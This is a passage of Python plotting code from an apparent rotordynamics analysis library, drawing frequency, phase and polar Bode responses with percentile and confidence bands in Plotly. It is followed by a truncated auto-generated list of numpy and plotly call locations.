self.number_dof dofy = p[0] * self.number_dof + 1 angle = p[1] # fmt: off operator = np.array( [[np.cos(angle), - np.sin(angle)], [np.cos(angle), + np.sin(angle)]] ) probe_resp = np.zeros_like(self.magnitude[:, :, 0]) for j, mag in enumerate(self.magnitude): _probe_resp = operator @ np.vstack((mag[:, dofx], mag[:, dofy])) probe_resp[i] = np.sqrt((_probe_resp[0] * np.cos(angle)) ** 2 + (_probe_resp[1] * np.sin(angle)) ** 2) # fmt: on fig.add_trace( go.Scatter( x=self.frequency_range, y=np.mean(probe_resp, axis=0), opacity=1.0, mode="lines", line=dict(width=3, color=list(tableau_colors)[i]), name=f"Probe {i + 1} - Mean", legendgroup=f"Probe {i + 1} - Mean", hovertemplate="Frequency: %{x:.2f}<br>Amplitude: %{y:.2e}", ) ) for j, p in enumerate(percentile): fig.add_trace( go.Scatter( x=self.frequency_range, y=np.percentile(probe_resp, p, axis=0), opacity=0.6, mode="lines", line=dict(width=2.5, color=colors1[color_p]), name=f"Probe {i + 1} - percentile: {p}%", legendgroup=f"Probe {i + 1} - percentile: {p}%", hovertemplate="Frequency: %{x:.2f}<br>Amplitude: %{y:.2e}", ) ) color_p += 1 x = np.concatenate((self.frequency_range, self.frequency_range[::-1])) for j, p in enumerate(conf_interval): p1 = np.percentile(probe_resp, 50 + p / 2, axis=0) p2 = np.percentile(probe_resp, 50 - p / 2, axis=0) fig.add_trace( go.Scatter( x=x, y=np.concatenate((p1, p2[::-1])), mode="lines", line=dict(width=1, color=colors2[color_i]), fill="toself", fillcolor=colors2[color_i], opacity=0.5, name=f"Probe {i + 1} - confidence interval: {p}%", legendgroup=f"Probe {i + 1} - confidence interval: {p}%", hovertemplate="Frequency: %{x:.2f}<br>Amplitude: %{y:.2e}", ) ) color_i += 1 fig.update_xaxes(title_text="<b>Frequency</b>") fig.update_yaxes(title_text=y_axis_label) fig.update_layout(**kwargs) return fig def plot_phase(self, probe, percentile=[], conf_interval=[], fig=None, **kwargs): """Plot frequency response. This method plots the phase response given a set of probes. Parameters ---------- probe : list of tuples List with tuples (node, orientation angle). node : int indicate the node where the probe is located. orientation : float, probe orientation angle about the shaft. The 0 refers to +X direction. percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. fig : Plotly graph_objects.Figure() The figure object with the plot. kwargs : optional Additional key word arguments can be passed to change the plot layout (e.g. width=800, height=600, ...). *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. """ conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) if fig is None: fig = go.Figure() color_p = 0 color_i = 0 for i, p in enumerate(probe): probe_phase = np.zeros_like(self.phase[:, :, 0]) for j, phs in enumerate(self.phase): aux_phase = phs[:, p[0] * self.number_dof] probe_phase[i] = np.array( [i + 2 * np.pi if i < 0 else i for i in aux_phase] ) angle = p[1] probe_phase[i] = probe_phase[i] - angle fig.add_trace( go.Scatter( x=self.frequency_range, y=np.mean(probe_phase, axis=0), opacity=1.0, mode="lines", line=dict(width=3, color=list(tableau_colors)[i]), name=f"Probe {i + 1} - Mean", legendgroup=f"Probe {i + 1} - Mean", hovertemplate="Frequency: %{x:.2f}<br>Phase: %{y:.2f}", ) ) for j, p in enumerate(percentile): fig.add_trace( go.Scatter( x=self.frequency_range, y=np.percentile(probe_phase, p, axis=0), opacity=0.6, mode="lines", line=dict(width=2.5, color=colors1[color_p]), name=f"Probe {i + 1} - percentile: {p}%", legendgroup=f"Probe {i + 1} - percentile: {p}%", hovertemplate="Frequency: %{x:.2f}<br>Phase: %{y:.2f}", ) ) color_p += 1 x = np.concatenate((self.frequency_range, self.frequency_range[::-1])) for j, p in enumerate(conf_interval): p1 = np.percentile(probe_phase, 50 + p / 2, axis=0) p2 = np.percentile(probe_phase, 50 - p / 2, axis=0) fig.add_trace( go.Scatter( x=x, y=np.concatenate((p1, p2[::-1])), mode="lines", line=dict(width=1, color=colors2[color_i]), fill="toself", fillcolor=colors2[color_i], opacity=0.5, name=f"Probe {i + 1} - confidence interval: {p}%", legendgroup=f"Probe {i + 1} - confidence interval: {p}%", hovertemplate="Frequency: %{x:.2f}<br>Phase: %{y:.2f}", ) ) color_i += 1 fig.update_xaxes(title_text="<b>Frequency</b>") fig.update_yaxes(title_text="<b>Phase Angle</b>") fig.update_layout(**kwargs), return fig def plot_polar_bode( self, probe, percentile=[], conf_interval=[], fig=None, units="mic-pk-pk", **kwargs, ): """Plot polar forced response using Plotly. Parameters ---------- probe : list of tuples List with tuples (node, orientation angle). node : int indicate the node where the probe is located. orientation : float, probe orientation angle about the shaft. The 0 refers to +X direction. percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. fig : Plotly graph_objects.Figure() The figure object with the plot. units : str Magnitude unit system. Default is "mic-pk-pk" polar_kwargs : optional Additional key word arguments can be passed to change the plot layout only (e.g. width=1000, height=800, ...). *See Plotly Python Figure Reference for more information. Returns ------- fig : Plotly graph_objects.Figure() The figure object with the plot. """ conf_interval = np.sort(conf_interval) percentile = np.sort(percentile) if units == "m": r_axis_label = "<b>Amplitude (m)</b>" elif units == "mic-pk-pk": r_axis_label = "<b>Amplitude (μ pk-pk)</b>" else: r_axis_label = "<b>Amplitude (dB)</b>" if fig is None: fig = go.Figure() color_p = 0 color_i = 0 for i, p in enumerate(probe): dofx = p[0] * self.number_dof dofy = p[0] * self.number_dof + 1 angle = p[1] # fmt: off operator = np.array( [[np.cos(angle), - np.sin(angle)], [np.cos(angle), + np.sin(angle)]] ) probe_resp = np.zeros_like(self.magnitude[:, :, 0]) for j, mag in enumerate(self.magnitude): _probe_resp = operator @ np.vstack((mag[:, dofx], mag[:, dofy])) probe_resp[i] = np.sqrt((_probe_resp[0] * np.cos(angle)) ** 2 + (_probe_resp[1] * np.sin(angle)) ** 2) # fmt: on probe_phase = np.zeros_like(self.phase[:, :, 0]) for j, phs in enumerate(self.phase): aux_phase = phs[:, p[0] * self.number_dof] probe_phase[i] = np.array( [i + 2 * np.pi if i < 0 else i for i in aux_phase] ) angle = p[1] probe_phase[i] = probe_phase[i] - angle fig.add_trace( go.Scatterpolar( r=np.mean(probe_resp, axis=0), theta=np.mean(probe_phase, axis=0), customdata=self.frequency_range, thetaunit="radians", mode="lines", line=dict(width=3.0, color=list(tableau_colors)[i]), name=f"Probe {i + 1} - Mean", legendgroup=f"Probe {i + 1} - Mean", hovertemplate=( "<b>Amplitude: %{r:.2e}</b><br>" + "<b>Phase: %{theta:.2f}</b><br>" + "<b>Frequency: %{customdata:.2f}</b>" ), ) ) for j, p in enumerate(percentile): fig.add_trace( go.Scatterpolar( r=np.percentile(probe_resp, p, axis=0), theta=np.percentile(probe_phase, p, axis=0), customdata=self.frequency_range, thetaunit="radians", opacity=0.6, line=dict(width=2.5, color=colors1[color_p]), name=f"Probe {i + 1} - percentile: {p}%", legendgroup=f"Probe {i + 1} - percentile{p}", hovertemplate=( "<b>Amplitude: %{r:.2e}</b><br>" + "<b>Phase: %{theta:.2f}</b><br>" + "<b>Frequency: %{customdata:.2f}</b>" ), ) ) color_p += 1 for j, p in enumerate(conf_interval): p1 = np.percentile(probe_resp, 50 + p / 2, axis=0) p2 = np.percentile(probe_resp, 50 - p / 2, axis=0) p3 = np.percentile(probe_phase, 50 + p / 2, axis=0) p4 = np.percentile(probe_phase, 50 - p / 2, axis=0) fig.add_trace( go.Scatterpolar( r=np.concatenate((p1, p2[::-1])), theta=np.concatenate((p3, p4[::-1])), thetaunit="radians", line=dict(width=1, color=colors2[color_i]), fill="toself", fillcolor=colors2[color_i], opacity=0.5, name=f"Probe {i + 1} - confidence interval: {p}%", legendgroup=f"Probe {i + 1} - confidence interval: {p}%", ) ) color_i += 1 fig.update_layout( polar=dict( radialaxis=dict(title_text=r_axis_label, exponentformat="E"), angularaxis=dict(exponentformat="E"), ), **kwargs, ) return fig def plot( self, probe, percentile=[], conf_interval=[], fig=None, units="mic-pk-pk", **kwargs, ): """Plot frequency response. This method plots the frequency and phase response given a set of probes. Parameters ---------- dof : int Degree of freedom to observe the response. percentile : list, optional Sequence of percentiles to compute, which must be between 0 and 100 inclusive. conf_interval : list, optional Sequence of confidence intervals to compute, which must be between 0 and 100 inclusive. units : str, optional Unit system Default is "mic-pk-pk" kwargs : optional Additional key word arguments can be passed to change the plot (e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...) *See Plotly Python Figure Reference for more information. Returns ------- subplots : Plotly graph_objects.make_subplots() Plotly figure with amplitude vs frequency phase angle vs frequency. """ # fmt: off fig0 = self.plot_magnitude(probe, percentile, conf_interval, units=units, **kwargs) fig1 = self.plot_phase(probe, percentile, conf_interval, **kwargs) fig2 = self.plot_polar_bode(probe, percentile, conf_interval, units=units, **kwargs) if fig is None: fig = make_subplots( rows=2, cols=2, specs=[[{}, {"type": "polar", "rowspan": 2}], [{}, None]] ) # fmt: on for data in fig0["data"]: data.showlegend = False fig.add_trace(data, row=1, col=1) for data in fig1["data"]: data.showlegend = False fig.add_trace(data, row=2, col=1) for data in fig2["data"]: fig.add_trace(data, row=1, col=2) fig.update_xaxes(fig0.layout.xaxis, row=1, col=1) fig.update_yaxes(fig0.layout.yaxis, row=1, col=1) fig.update_xaxes(fig1.layout.xaxis, row=2, col=1) fig.update_yaxes(fig1.layout.yaxis, row=2, col=1) fig.update_layout( polar=dict( radialaxis=fig2.layout.polar.radialaxis, angularaxis=fig2.layout.polar.angularaxis, ), ) return fig
[((2441, 2463), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (2448, 2463), True, 'import numpy as np\n'), ((2485, 2504), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (2492, 2504), True, 'import numpy as np\n'), ((2601, 2612), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (2610, 2612), True, 'from plotly import graph_objects as go\n'), ((2625, 2683), 'numpy.concatenate', 'np.concatenate', (['(self.speed_range, self.speed_range[::-1])'], {}), '((self.speed_range, self.speed_range[::-1]))\n', (2639, 2683), True, 'import numpy as np\n'), ((7324, 7346), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (7331, 7346), True, 'import numpy as np\n'), ((7368, 7387), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (7375, 7387), True, 'import numpy as np\n'), ((7484, 7495), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (7493, 7495), True, 'from plotly import graph_objects as go\n'), ((7508, 7566), 'numpy.concatenate', 'np.concatenate', (['(self.speed_range, self.speed_range[::-1])'], {}), '((self.speed_range, self.speed_range[::-1]))\n', (7522, 7566), True, 'import numpy as np\n'), ((11809, 11838), 'plotly.subplots.make_subplots', 'make_subplots', ([], {'rows': '(1)', 'cols': '(2)'}), '(rows=1, cols=2)\n', (11822, 11838), False, 'from plotly.subplots import make_subplots\n'), ((14773, 14795), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (14780, 14795), True, 'import numpy as np\n'), ((14817, 14836), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (14824, 14836), True, 'import numpy as np\n'), ((14933, 14944), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (14942, 14944), True, 'from plotly import graph_objects as go\n'), ((15927, 15985), 'numpy.concatenate', 'np.concatenate', (['(self.speed_range, self.speed_range[::-1])'], {}), '((self.speed_range, self.speed_range[::-1]))\n', (15941, 15985), True, 'import numpy as np\n'), ((18675, 18697), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (18682, 18697), True, 'import numpy as np\n'), ((18719, 18738), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (18726, 18738), True, 'import numpy as np\n'), ((18835, 18846), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (18844, 18846), True, 'from plotly import graph_objects as go\n'), ((19813, 19871), 'numpy.concatenate', 'np.concatenate', (['(self.speed_range, self.speed_range[::-1])'], {}), '((self.speed_range, self.speed_range[::-1]))\n', (19827, 19871), True, 'import numpy as np\n'), ((22384, 22406), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (22391, 22406), True, 'import numpy as np\n'), ((22428, 22447), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (22435, 22447), True, 'import numpy as np\n'), ((22776, 22787), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (22785, 22787), True, 'from plotly import graph_objects as go\n'), ((27101, 27193), 'plotly.subplots.make_subplots', 'make_subplots', ([], {'rows': '(2)', 'cols': '(2)', 'specs': "[[{}, {'type': 'polar', 'rowspan': 2}], [{}, None]]"}), "(rows=2, cols=2, specs=[[{}, {'type': 'polar', 'rowspan': 2}],\n [{}, None]])\n", (27114, 27193), False, 'from plotly.subplots import make_subplots\n'), ((30689, 30711), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (30696, 30711), True, 'import numpy as np\n'), ((30733, 30752), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (30740, 30752), True, 'import numpy as np\n'), ((34671, 34693), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (34678, 34693), True, 'import numpy as np\n'), ((34715, 34734), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (34722, 34734), True, 'import numpy as np\n'), ((38288, 38310), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (38295, 38310), True, 'import numpy as np\n'), ((38332, 38351), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (38339, 38351), True, 'import numpy as np\n'), ((45455, 45477), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (45462, 45477), True, 'import numpy as np\n'), ((45499, 45518), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (45506, 45518), True, 'import numpy as np\n'), ((49896, 49918), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (49903, 49918), True, 'import numpy as np\n'), ((49940, 49959), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (49947, 49959), True, 'import numpy as np\n'), ((54194, 54216), 'numpy.sort', 'np.sort', (['conf_interval'], {}), '(conf_interval)\n', (54201, 54216), True, 'import numpy as np\n'), ((54238, 54257), 'numpy.sort', 'np.sort', (['percentile'], {}), '(percentile)\n', (54245, 54257), True, 'import numpy as np\n'), ((16049, 16098), 'numpy.percentile', 'np.percentile', (['self.magnitude', '(50 + p / 2)'], {'axis': '(1)'}), '(self.magnitude, 50 + p / 2, axis=1)\n', (16062, 16098), True, 'import numpy as np\n'), ((16116, 16165), 'numpy.percentile', 'np.percentile', (['self.magnitude', '(50 - p / 2)'], {'axis': '(1)'}), '(self.magnitude, 50 - p / 2, axis=1)\n', (16129, 16165), True, 'import numpy as np\n'), ((19935, 19980), 'numpy.percentile', 'np.percentile', (['self.phase', '(50 + p / 2)'], {'axis': '(1)'}), '(self.phase, 50 + p / 2, axis=1)\n', (19948, 19980), True, 'import numpy as np\n'), ((19998, 20043), 'numpy.percentile', 'np.percentile', (['self.phase', '(50 - p / 2)'], {'axis': '(1)'}), '(self.phase, 50 - p / 2, axis=1)\n', (20011, 20043), True, 'import numpy as np\n'), ((24302, 24351), 'numpy.percentile', 'np.percentile', (['self.magnitude', '(50 + p / 2)'], {'axis': '(1)'}), '(self.magnitude, 50 + p / 2, axis=1)\n', (24315, 24351), True, 'import numpy as np\n'), ((24369, 24418), 'numpy.percentile', 'np.percentile', (['self.magnitude', '(50 - p / 2)'], {'axis': '(1)'}), '(self.magnitude, 50 - p / 2, axis=1)\n', (24382, 24418), True, 'import numpy as np\n'), ((24436, 24481), 'numpy.percentile', 'np.percentile', (['self.phase', '(50 + p / 2)'], {'axis': '(1)'}), '(self.phase, 50 + p / 2, axis=1)\n', (24449, 24481), True, 'import numpy as np\n'), ((24499, 24544), 'numpy.percentile', 'np.percentile', (['self.phase', '(50 - p / 2)'], {'axis': '(1)'}), '(self.phase, 50 - p / 2, axis=1)\n', (24512, 24544), True, 'import numpy as np\n'), ((30608, 30619), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (30617, 30619), True, 'from plotly import graph_objects as go\n'), ((31185, 31220), 'numpy.zeros_like', 'np.zeros_like', (['self.yout[:, :, (0)]'], {}), '(self.yout[:, :, (0)])\n', (31198, 31220), True, 'import numpy as np\n'), ((32488, 32544), 'numpy.concatenate', 'np.concatenate', (['(self.time_range, self.time_range[::-1])'], {}), '((self.time_range, self.time_range[::-1]))\n', (32502, 32544), True, 'import numpy as np\n'), ((34859, 34870), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (34868, 34870), True, 'from plotly import graph_objects as go\n'), ((36009, 36071), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * node]', '(50 + p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * node], 50 + p / 2, axis=0)\n', (36022, 36071), True, 'import numpy as np\n'), ((36089, 36151), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * node]', '(50 - p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * node], 50 - p / 2, axis=0)\n', (36102, 36151), True, 'import numpy as np\n'), ((36169, 36235), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * node + 1]', '(50 + p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * node + 1], 50 + p / 2, axis=0)\n', (36182, 36235), True, 'import numpy as np\n'), ((36253, 36319), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * node + 1]', '(50 - p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * node + 1], 50 - p / 2, axis=0)\n', (36266, 36319), True, 'import numpy as np\n'), ((38476, 38487), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (38485, 38487), True, 'from plotly import graph_objects as go\n'), ((45562, 45573), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (45571, 45573), True, 'from plotly import graph_objects as go\n'), ((45965, 46005), 'numpy.zeros_like', 'np.zeros_like', (['self.magnitude[:, :, (0)]'], {}), '(self.magnitude[:, :, (0)])\n', (45978, 46005), True, 'import numpy as np\n'), ((47503, 47569), 'numpy.concatenate', 'np.concatenate', (['(self.frequency_range, self.frequency_range[::-1])'], {}), '((self.frequency_range, self.frequency_range[::-1]))\n', (47517, 47569), True, 'import numpy as np\n'), ((50003, 50014), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (50012, 50014), True, 'from plotly import graph_objects as go\n'), ((50120, 50156), 'numpy.zeros_like', 'np.zeros_like', (['self.phase[:, :, (0)]'], {}), '(self.phase[:, :, (0)])\n', (50133, 50156), True, 'import numpy as np\n'), ((51658, 51724), 'numpy.concatenate', 'np.concatenate', (['(self.frequency_range, self.frequency_range[::-1])'], {}), '((self.frequency_range, self.frequency_range[::-1]))\n', (51672, 51724), True, 'import numpy as np\n'), ((54533, 54544), 'plotly.graph_objects.Figure', 'go.Figure', ([], {}), '()\n', (54542, 54544), True, 'from plotly import graph_objects as go\n'), ((54936, 54976), 'numpy.zeros_like', 'np.zeros_like', (['self.magnitude[:, :, (0)]'], {}), '(self.magnitude[:, :, (0)])\n', (54949, 54976), True, 'import numpy as np\n'), ((55317, 55353), 'numpy.zeros_like', 'np.zeros_like', (['self.phase[:, :, (0)]'], {}), '(self.phase[:, :, (0)])\n', (55330, 55353), True, 'import numpy as np\n'), ((60096, 60188), 'plotly.subplots.make_subplots', 'make_subplots', ([], {'rows': '(2)', 'cols': '(2)', 'specs': "[[{}, {'type': 'polar', 'rowspan': 2}], [{}, None]]"}), "(rows=2, cols=2, specs=[[{}, {'type': 'polar', 'rowspan': 2}],\n [{}, None]])\n", (60109, 60188), False, 'from plotly.subplots import make_subplots\n'), ((4495, 4540), 'numpy.percentile', 'np.percentile', (['self.wd[j]', '(50 + p / 2)'], {'axis': '(1)'}), '(self.wd[j], 50 + p / 2, axis=1)\n', (4508, 4540), True, 'import numpy as np\n'), ((4562, 4607), 'numpy.percentile', 'np.percentile', (['self.wd[j]', '(50 - p / 2)'], {'axis': '(1)'}), '(self.wd[j], 50 - p / 2, axis=1)\n', (4575, 4607), True, 'import numpy as np\n'), ((8751, 8801), 'numpy.percentile', 'np.percentile', (['self.log_dec[j]', '(50 + p / 2)'], {'axis': '(1)'}), '(self.log_dec[j], 50 + p / 2, axis=1)\n', (8764, 8801), True, 'import numpy as np\n'), ((8823, 8873), 'numpy.percentile', 'np.percentile', (['self.log_dec[j]', '(50 - p / 2)'], {'axis': '(1)'}), '(self.log_dec[j], 50 - p / 2, axis=1)\n', (8836, 8873), True, 'import numpy as np\n'), ((32616, 32661), 'numpy.percentile', 'np.percentile', (['probe_resp', '(50 + p / 2)'], {'axis': '(0)'}), '(probe_resp, 50 + p / 2, axis=0)\n', (32629, 32661), True, 'import numpy as np\n'), ((32683, 32728), 'numpy.percentile', 'np.percentile', (['probe_resp', '(50 - p / 2)'], {'axis': '(0)'}), '(probe_resp, 50 - p / 2, axis=0)\n', (32696, 32728), True, 'import numpy as np\n'), ((38886, 38913), 'numpy.ones', 'np.ones', (['self.yout.shape[1]'], {}), '(self.yout.shape[1])\n', (38893, 38913), True, 'import numpy as np\n'), ((47641, 47686), 'numpy.percentile', 'np.percentile', (['probe_resp', '(50 + p / 2)'], {'axis': '(0)'}), '(probe_resp, 50 + p / 2, axis=0)\n', (47654, 47686), True, 'import numpy as np\n'), ((47708, 47753), 'numpy.percentile', 'np.percentile', (['probe_resp', '(50 - p / 2)'], {'axis': '(0)'}), '(probe_resp, 50 - p / 2, axis=0)\n', (47721, 47753), True, 'import numpy as np\n'), ((50296, 50358), 'numpy.array', 'np.array', (['[(i + 2 * np.pi if i < 0 else i) for i in aux_phase]'], {}), '([(i + 2 * np.pi if i < 0 else i) for i in aux_phase])\n', (50304, 50358), True, 'import numpy as np\n'), ((51796, 51842), 'numpy.percentile', 'np.percentile', (['probe_phase', '(50 + p / 2)'], {'axis': '(0)'}), '(probe_phase, 50 + p / 2, axis=0)\n', (51809, 51842), True, 'import numpy as np\n'), ((51864, 51910), 'numpy.percentile', 'np.percentile', (['probe_phase', '(50 - p / 2)'], {'axis': '(0)'}), '(probe_phase, 50 - p / 2, axis=0)\n', (51877, 51910), True, 'import numpy as np\n'), ((55493, 55555), 'numpy.array', 'np.array', (['[(i + 2 * np.pi if i < 0 else i) for i in aux_phase]'], {}), '([(i + 2 * np.pi if i < 0 else i) for i in aux_phase])\n', (55501, 55555), True, 'import numpy as np\n'), ((57417, 57462), 'numpy.percentile', 'np.percentile', (['probe_resp', '(50 + p / 2)'], {'axis': '(0)'}), '(probe_resp, 50 + p / 2, axis=0)\n', (57430, 57462), True, 'import numpy as np\n'), ((57484, 57529), 'numpy.percentile', 'np.percentile', (['probe_resp', '(50 - p / 2)'], {'axis': '(0)'}), '(probe_resp, 50 - p / 2, axis=0)\n', (57497, 57529), True, 'import numpy as np\n'), ((57551, 57597), 'numpy.percentile', 'np.percentile', (['probe_phase', '(50 + p / 2)'], {'axis': '(0)'}), '(probe_phase, 50 + p / 2, axis=0)\n', (57564, 57597), True, 'import numpy as np\n'), ((57619, 57665), 'numpy.percentile', 'np.percentile', (['probe_phase', '(50 - p / 2)'], {'axis': '(0)'}), '(probe_phase, 50 - p / 2, axis=0)\n', (57632, 57665), True, 'import numpy as np\n'), ((15047, 15078), 'numpy.mean', 'np.mean', (['self.magnitude'], {'axis': '(1)'}), '(self.magnitude, axis=1)\n', (15054, 15078), True, 'import numpy as np\n'), ((18949, 18976), 'numpy.mean', 'np.mean', (['self.phase'], {'axis': '(1)'}), '(self.phase, axis=1)\n', (18956, 18976), True, 'import numpy as np\n'), ((22859, 22890), 'numpy.mean', 'np.mean', (['self.magnitude'], {'axis': '(1)'}), '(self.magnitude, axis=1)\n', (22866, 22890), True, 'import numpy as np\n'), ((22914, 22941), 'numpy.mean', 'np.mean', (['self.phase'], {'axis': '(1)'}), '(self.phase, axis=1)\n', (22921, 22941), True, 'import numpy as np\n'), ((31306, 31345), 'numpy.vstack', 'np.vstack', (['(y[:, (dofx)], y[:, (dofy)])'], {}), '((y[:, (dofx)], y[:, (dofy)]))\n', (31315, 31345), True, 'import numpy as np\n'), ((34937, 34981), 'numpy.mean', 'np.mean', (['self.yout[..., ndof * node]'], {'axis': '(0)'}), '(self.yout[..., ndof * node], axis=0)\n', (34944, 34981), True, 'import numpy as np\n'), ((35001, 35049), 'numpy.mean', 'np.mean', (['self.yout[..., ndof * node + 1]'], {'axis': '(0)'}), '(self.yout[..., ndof * node + 1], axis=0)\n', (35008, 35049), True, 'import numpy as np\n'), ((46098, 46141), 'numpy.vstack', 'np.vstack', (['(mag[:, (dofx)], mag[:, (dofy)])'], {}), '((mag[:, (dofx)], mag[:, (dofy)]))\n', (46107, 46141), True, 'import numpy as np\n'), ((55069, 55112), 'numpy.vstack', 'np.vstack', (['(mag[:, (dofx)], mag[:, (dofy)])'], {}), '((mag[:, (dofx)], mag[:, (dofy)]))\n', (55078, 55112), True, 'import numpy as np\n'), ((3383, 3410), 'numpy.mean', 'np.mean', (['self.wd[j]'], {'axis': '(1)'}), '(self.wd[j], axis=1)\n', (3390, 3410), True, 'import numpy as np\n'), ((7732, 7764), 'numpy.mean', 'np.mean', (['self.log_dec[j]'], {'axis': '(1)'}), '(self.log_dec[j], axis=1)\n', (7739, 7764), True, 'import numpy as np\n'), ((15518, 15558), 'numpy.percentile', 'np.percentile', (['self.magnitude', 'p'], {'axis': '(1)'}), '(self.magnitude, p, axis=1)\n', (15531, 15558), True, 'import numpy as np\n'), ((16268, 16298), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (16282, 16298), True, 'import numpy as np\n'), ((19412, 19448), 'numpy.percentile', 'np.percentile', (['self.phase', 'p'], {'axis': '(1)'}), '(self.phase, p, axis=1)\n', (19425, 19448), True, 'import numpy as np\n'), ((20146, 20176), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (20160, 20176), True, 'import numpy as np\n'), ((23537, 23577), 'numpy.percentile', 'np.percentile', (['self.magnitude', 'p'], {'axis': '(1)'}), '(self.magnitude, p, axis=1)\n', (23550, 23577), True, 'import numpy as np\n'), ((23605, 23641), 'numpy.percentile', 'np.percentile', (['self.phase', 'p'], {'axis': '(1)'}), '(self.phase, p, axis=1)\n', (23618, 23641), True, 'import numpy as np\n'), ((24627, 24657), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (24641, 24657), True, 'import numpy as np\n'), ((24685, 24715), 'numpy.concatenate', 'np.concatenate', (['(p3, p4[::-1])'], {}), '((p3, p4[::-1]))\n', (24699, 24715), True, 'import numpy as np\n'), ((31061, 31074), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (31067, 31074), True, 'import numpy as np\n'), ((31112, 31125), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (31118, 31125), True, 'import numpy as np\n'), ((31647, 31674), 'numpy.mean', 'np.mean', (['probe_resp'], {'axis': '(0)'}), '(probe_resp, axis=0)\n', (31654, 31674), True, 'import numpy as np\n'), ((35459, 35512), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * node]', 'p'], {'axis': '(0)'}), '(self.yout[..., ndof * node], p, axis=0)\n', (35472, 35512), True, 'import numpy as np\n'), ((35536, 35593), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * node + 1]', 'p'], {'axis': '(0)'}), '(self.yout[..., ndof * node + 1], p, axis=0)\n', (35549, 35593), True, 'import numpy as np\n'), ((36397, 36427), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (36411, 36427), True, 'import numpy as np\n'), ((36451, 36481), 'numpy.concatenate', 'np.concatenate', (['(p3, p4[::-1])'], {}), '((p3, p4[::-1]))\n', (36465, 36481), True, 'import numpy as np\n'), ((39038, 39079), 'numpy.mean', 'np.mean', (['self.yout[..., ndof * n]'], {'axis': '(0)'}), '(self.yout[..., ndof * n], axis=0)\n', (39045, 39079), True, 'import numpy as np\n'), ((39103, 39148), 'numpy.mean', 'np.mean', (['self.yout[..., ndof * n + 1]'], {'axis': '(0)'}), '(self.yout[..., ndof * n + 1], axis=0)\n', (39110, 39148), True, 'import numpy as np\n'), ((45841, 45854), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (45847, 45854), True, 'import numpy as np\n'), ((45892, 45905), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (45898, 45905), True, 'import numpy as np\n'), ((46441, 46468), 'numpy.mean', 'np.mean', (['probe_resp'], {'axis': '(0)'}), '(probe_resp, axis=0)\n', (46448, 46468), True, 'import numpy as np\n'), ((50602, 50630), 'numpy.mean', 'np.mean', (['probe_phase'], {'axis': '(0)'}), '(probe_phase, axis=0)\n', (50609, 50630), True, 'import numpy as np\n'), ((54812, 54825), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (54818, 54825), True, 'import numpy as np\n'), ((54863, 54876), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (54869, 54876), True, 'import numpy as np\n'), ((55760, 55787), 'numpy.mean', 'np.mean', (['probe_resp'], {'axis': '(0)'}), '(probe_resp, axis=0)\n', (55767, 55787), True, 'import numpy as np\n'), ((55815, 